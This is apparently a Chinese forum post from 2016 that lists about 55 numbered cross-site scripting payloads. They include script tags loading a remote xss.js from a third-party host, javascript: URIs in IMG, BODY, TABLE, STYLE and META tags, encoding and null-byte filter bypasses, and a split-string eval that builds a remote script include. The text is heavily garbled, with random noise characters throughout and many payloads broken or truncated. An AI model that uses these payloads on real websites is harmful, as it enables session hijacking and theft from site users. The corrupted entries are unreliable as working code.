(1)普通的XSS JavaScript注入
3 F, v" G8 p! f<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
6 t6 n. A, ^( M9 J' ^3 {* l: u(99)另类弹框
9 V& A) Q _. F& C* ]- q<q/oncut=alert()>10 e5 R& O$ ^/ l: W9 [
<s/onclick=alert()>b
& e9 _) R0 R- w- X' Z <XSS=" onclick="alert(1)//">clickme</SSX=">
3 E. p9 c- @1 r) x0 s <zzz onclick=alert`1`>clickme</zzz> 5 U% \5 b& M5 ?7 B2 ~8 ~1 P
<a onclick=alert`1`>clickme</a>
! i3 B4 R% N6 |: V2 ^<a=">clickme</a=">0 e' M# t d, n
<a=">clickme</a>% B6 V/ }0 {" q, N% H- z# X
<z=">clickme</z=">
5 A) |: Z, O& d+ G$ `" }7 |<z onclick=alert`1`>clickme</z>& y' L, H8 p0 b) c R0 D( s( L: n
3 A- A! I% W" J/ u) c$ e(2)IMG标签XSS使用JavaScript命令$ E4 S" Y* K: M) } R3 |- j
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>$ z0 n- n0 h1 Z; X+ K% `
- ?% I* B- K- Q(3)IMG标签无分号无引号
; T2 C5 }* E: E; N+ O3 @<IMG SRC=javascript:alert(‘XSS’)>
( V" |/ d2 t. d4 z' l5 } }7 k7 d* g1 m5 Y" {4 {5 u1 \
(4)IMG标签大小写不敏感
1 L3 O/ S$ }9 p+ e<IMG SRC=JaVaScRiPt:alert(‘XSS’)>
) T% C8 G' e2 J+ o0 v, i- x# T
: k# f$ y0 {( d. H) l(5)HTML编码(必须有分号)5 t& Y" |& h: p
<IMG SRC=javascript:alert(“XSS”)>
; C# \( R0 I0 @
" G [ j0 j1 ~3 }- J$ P(6)修正缺陷IMG标签
4 N" v" t# u+ S: Y( t. y<IMG “”"><SCRIPT>alert(“XSS”)</SCRIPT>”>
! {0 i, r/ P% U/ J6 i+ Q2 v3 ~+ f% X U
(7)formCharCode标签(计算器)
. _! m6 I# a! K; v5 v9 J4 I<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
/ ?# i. a+ b1 \ h+ ?0 [% \6 \3 h" T3 S- p& A4 r
(8)UTF-8的Unicode编码(计算器)$ M( W* @: \) m8 J }
<IMG SRC=jav..省略..S')>7 ?2 H) `8 @+ o' `4 E& L! l# [
4 _2 Y% X: q" m8 d5 ~& U, N$ C(9)7位的UTF-8的Unicode编码是没有分号的(计算器)( o0 l& p) G* I( t, G% D
<IMG SRC=jav..省略..S')>; o" J0 o7 L+ N* I8 L- P7 a: V
+ J$ D E/ t5 z/ s. {(10)十六进制编码也是没有分号(计算器)9 u2 O+ L1 F1 ~, s6 l7 [ @) D
<IMG SRC=\'#\'" /span>( K; i) z: Z# R. @
8 ~- W3 U6 D5 ^6 x$ k4 U3 Z6 M, l(11)嵌入式标签,将Javascript分开
: e# U3 u) A1 k" j2 _( r. n3 [2 d<IMG SRC=\'#\'" ascript:alert(‘XSS’);”>
$ Z5 `9 d# Y& H" ~! j$ F! l; `0 z& g: X" W {
(12)嵌入式编码标签,将Javascript分开
+ y/ _+ F$ @5 e. {<IMG SRC=\'#\'" ascript:alert(‘XSS’);”>
' A% \5 o3 E0 K7 U/ I6 }1 D5 Z: \
; N# h* Q+ L. [) @* `8 N1 ?(13)嵌入式换行符
b' P1 A" o; [; d<IMG SRC=\'#\'" ascript:alert(‘XSS’);”>
2 n; t# i5 |. F1 e! | L. j/ o/ J$ i2 e+ a/ }
(14)嵌入式回车
2 u; e+ P J4 d<IMG SRC=\'#\'" ascript:alert(‘XSS’);”>4 n. V5 _1 e8 O2 P8 _, o& ]# n
' g. X- P0 H- m4 W
(15)嵌入式多行注入JavaScript,这是XSS极端的例子9 ?* I/ M" o, n' j. ~# v
<IMG SRC=\'#\'" /span>; e- E. O8 R0 t- l: \! |2 H
9 Z, t* |1 x8 o3 D5 Q3 \ O
(16)解决限制字符(要求同页面)6 T8 E V7 W$ h3 A/ E( o* ?
<script>z=’document.’</script>( X+ P3 w+ a- n, d
<script>z=z+’write(“‘</script>; Q0 A; k i" q) m) Q
<script>z=z+’<script’</script>( O. X3 Y' v8 x
<script>z=z+’ src=ht’</script>( G3 t) S! c0 P
<script>z=z+’tp://ww’</script>
; ~3 p$ N1 U& T<script>z=z+’w.shell’</script>
, L7 q& r* l: c" z; G<script>z=z+’.net/1.’</script>* P# |& H# i; ^7 C- ~, v
<script>z=z+’js></sc’</script>( o8 b$ S; i1 g1 S2 C
<script>z=z+’ript>”)’</script>/ h( F" a5 u' N' _. K
<script>eval_r(z)</script>
# q) ~6 @2 U' K" X) A1 G
1 s/ Z" c. Y& A6 n( t% ~(17)空字符 @6 v! J9 D: \+ N4 w+ C; z( ?
perl -e ‘print “<IMG SRC=java\0script:alert(\”XSS\”)>”;’ > out$ J, }" u# s$ U7 Y# ]+ i" P7 G
( `3 [( x# a) j) @7 ]* F$ d
(18)空字符2,空字符在国内基本没效果.因为没有地方可以利用
5 n& x% w5 F# G" i* X7 f: |perl -e ‘print “<SCR\0IPT>alert(\”XSS\”)</SCR\0IPT>”;’ > out
2 t8 L6 ^3 I8 b9 \3 }: V7 g+ A+ i
* _- ^7 O# v+ c* w1 x4 q. X+ Z I(19)Spaces和meta前的IMG标签
J7 {- O& ]: u9 [<IMG SRC=\'#\'" � javascript:alert(‘XSS’);”> z! B7 \1 @: X# m0 |8 N [6 ~
/ m2 C2 C% K) j8 ^$ B# ?9 |* U(20)Non-alpha-non-digit XSS: s ?& ]! X* Y" X# D
<SCRIPT/XSS SRC=\'#\'" /span>http://3w.org/XSS/xss.js”></SCRIPT>+ d# @# K; \: W3 r
- {& C0 M g# E( e8 l0 K" z# G. q
(21)Non-alpha-non-digit XSS to 2
$ \) b1 d) T% D* g! R<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“XSS”)>+ E( z* t# J- R( S, {. w
4 B8 w2 i* Z0 V
(22)Non-alpha-non-digit XSS to 3
/ t$ d ]0 k2 N6 K* R- I0 M<SCRIPT/SRC=\'#\'" /span>http://3w.org/XSS/xss.js”></SCRIPT>
9 ]/ ]2 Q3 b/ v @2 r/ n8 X9 p! x5 y7 [; f* G" J0 g9 T* _
(23)双开括号
) U9 S3 t; `/ K3 F<<SCRIPT>alert(“XSS”);//<</SCRIPT>
8 e& X" o5 p8 T z8 q4 {% J1 @6 R; o2 m1 O' w
(24)无结束脚本标记(仅火狐等浏览器)5 t6 @* T" D% [$ l
<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>
9 e9 Q4 [' I1 y+ O) }$ l0 k O2 f$ z! ^
% P( D& d/ V9 p* N5 g- j; j& w4 I(25)无结束脚本标记2
2 c7 ~0 c! g9 _* e* J<SCRIPT SRC=//3w.org/XSS/xss.js>) h, I! y* H$ J3 h* V$ j5 M3 E
; T1 H% }2 t5 Y$ W$ Q1 X9 c
(26)半开的HTML/JavaScript XSS
% L P, `$ m3 S( ?5 S<IMG SRC=\'#\'" /span>
! G0 X7 s( c: n
+ q8 L. i5 q- \1 B9 H8 X5 @: ?(27)双开角括号. {5 I% g0 j; Z3 a" ? \( N6 n
<iframe src=http://3w.org/XSS.html <2 I# i# T- `' C
. y7 l+ f; A6 a0 ?' f3 G
(28)无单引号 双引号 分号
. x* ~1 ~6 u9 P4 ^<SCRIPT>a=/XSS/6 C5 X. _( c" {0 \. O7 n) @
alert(a.source)</SCRIPT>
& Y( h) x7 a1 z8 A, P( o- }/ {2 E: \& D4 `
(29)换码过滤的JavaScript: w* j1 c ~! n' C( _. C0 a
\”;alert(‘XSS’);//
, v7 U# a$ w r5 a4 i& {
' U7 f& e8 {7 W2 c _(30)结束Title标签
& I8 y0 L: J0 ^. y8 Q</TITLE><SCRIPT>alert(“XSS”);</SCRIPT>; ]! R: U: c" c+ v9 b
; B$ i% [" M- R) `4 e) d$ ~) v(31)Input Image
) p4 |$ G9 l; N5 l; D<INPUT SRC=\'#\'" /span>
, X; b) c$ f2 `8 h6 |% x9 C% j0 I+ A: ]: P6 [. X* |
(32)BODY Image g( U6 ?. o% K3 u5 G
<BODY BACKGROUND=”javascript:alert(‘XSS’)”>
( e: I- f$ |/ ]6 M' ]4 H8 C% @4 H8 ^4 G/ c0 i5 q
(33)BODY标签& {' Z7 y2 i: A7 t) a5 f
<BODY(‘XSS’)>0 j+ s+ L! y. X- q2 l* A0 \. J! P# X
2 q8 p! P5 d3 d4 C3 r9 ^. M& w3 c" H(34)IMG Dynsrc+ s4 V% V0 u8 s8 N2 T2 u# ]$ @
<IMG DYNSRC=\'#\'" /span>
4 W! c& H4 _) T8 O
% a ~! B8 f" k' H6 L- r8 D(35)IMG Lowsrc3 q8 N* P( H" L$ ^
<IMG LOWSRC=\'#\'" /span>' a: ]& N+ T7 i) [7 @7 ]) j
' S& b M6 R. |+ g0 @* z(36)BGSOUND
0 z0 u( N) @9 b( K) W( A9 H<BGSOUND SRC=\'#\'" /span>% k9 o. r" Z- G H3 t( U
+ \' F# M( v1 L" ]1 [2 g4 e# U8 O% a
(37)STYLE sheet
7 F* x% B) q: v1 Z) L0 a& @<LINK REL=”stylesheet” HREF=”javascript:alert(‘XSS’);”>
0 ?; r! C: W2 U* p$ l! G
9 N4 g% e2 k! N. h3 W, {(38)远程样式表3 p! S' R, H" u }& A! U" q
<LINK REL=”stylesheet” HREF=”http://3w.org/xss.css”>
; C5 w( V# j2 l) r: M. u3 M
7 X6 M! r# A: ?$ V) }: [, c(39)List-style-image(列表式)! E% j* X/ p) b) ]. G5 E1 Y
<STYLE>li {list-style-image: url(“javascript:alert(‘XSS’)”);}</STYLE><UL><LI>XSS: p+ T! N9 v. F: |1 x
* E2 l6 f* X% o# a! F o- y3 I8 B0 z(40)IMG VBscript
5 q1 L+ L" K7 }# z& u) E<IMG SRC=\'#\'" /STYLE><UL><LI>XSS
, _2 S& n9 X6 ?- W% Z* c9 w8 ~9 K# |) p$ k7 N' d" U: d
(41)META链接url0 `& O9 L7 s+ C' [- V! t8 N
<META HTTP-EQUIV=”refresh” CONTENT=”0; URL=http://;URL=javascript:alert(‘XSS’);”>
, O& ?; p3 X! h! H5 P* b! h) h, l5 m: i$ ]& G, ?" M
(42)Iframe
5 w9 V E# t0 j- W<IFRAME SRC=\'#\'" /IFRAME>
" h; h# q' L* {+ D+ d q* l
. r. s) s: K/ P/ K(43)Frame
+ d- K! g9 c: J( ?$ d8 H Y6 W<FRAMESET><FRAME SRC=\'#\'" /FRAMESET>
! \6 v( g8 c9 J7 H/ e2 h
- T1 f/ I/ W4 _ X E/ \(44)Table
' \% O; b) b2 W<TABLE BACKGROUND=”javascript:alert(‘XSS’)”>9 W/ `) m. y! M2 z$ n. d( o) _
! X! t/ U7 U% t+ z(45)TD. ?2 N% W9 p& X G; ~2 p% Y
<TABLE><TD BACKGROUND=”javascript:alert(‘XSS’)”>
) v4 A0 l8 C% L7 ^4 }, ^5 Y; k
6 m4 I# o' l: t' e- v5 e! G- z(46)DIV background-image' F' x6 E( L( [9 K: |
<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>7 C. M' x4 h& F' _: T* Z, B
8 R$ I) l* F: |3 `) n. {% z(47)DIV background-image后加上额外字符(1-32&34&39&160&8192-8&13&12288&65279)0 ]2 `8 v4 m# x: D1 g/ _
<DIV STYLE=”background-image: url(�javascript:alert(‘XSS’))”>
+ X( n% n) U6 o. ^5 v5 Z0 L# x# I& _; I2 f# v I* E
(48)DIV expression
: R1 } _: H. e ^1 F% |<DIV STYLE=”width: expression_r(alert(‘XSS’));”>
- B( h% z5 m1 R( `' Q- D7 n2 K! Z, `" ?# \: a
(49)STYLE属性分拆表达, E- b& ?9 z+ ]# z% i) _$ `, c6 W
<IMG STYLE=”xss:expression_r(alert(‘XSS’))”>
3 g1 q' z! H8 ^
/ }0 Q& l/ I2 W8 x) B- c(50)匿名STYLE(组成:开角号和一个字母开头)
# K/ N# M9 T5 ^. o& T b8 ? m<XSS STYLE=”xss:expression_r(alert(‘XSS’))”>
\8 }: D, Y9 ` Y" _) l3 x6 _( U' y# j; Q2 U0 K% G( n% V t9 B
(51)STYLE background-image
2 D& u2 t, A. s; k<STYLE>.XSS{background-image:url(“javascript:alert(‘XSS’)”);}</STYLE><A CLASS=XSS></A>
. }: s. D& m+ v3 Y7 y: M# V2 K- f; I) V) t
(52)IMG STYLE方式
! z; w. q4 f- e! M% Lexppression(alert(“XSS”))’>
! L! z8 F9 n w8 J& P' [" ^( H
9 Z) x! J& F5 b0 s6 {9 @3 |(53)STYLE background
4 J; p8 n1 v/ ?7 ` i2 [: q<STYLE><STYLE type=”text/css”>BODY{background:url(“javascript:alert(‘XSS’)”)}</STYLE># ^, r6 P) n3 | M# y. _6 J6 y- o
9 A+ B/ p" X% a4 B3 Q
(54)BASE
3 u) p: B0 h$ i$ M/ X<BASE HREF=”javascript:alert(‘XSS’);//”>
1 `; a* d8 z! V+ o* D1 v
3 E) p" S* o/ v4 V2 Y9 U5 L3 l(55)EMBED标签,你可以嵌入FLASH,其中包涵XSS2 w2 d/ @1 P7 e: a9 u. G' g3 j
<EMBED SRC=\'#\'" /span>http://3w.org/XSS/xss.swf” ></EMBED>1 f: X, v) o, P) D2 ]
|
发表于 2016-4-28 10:06:15
收藏
支持
反对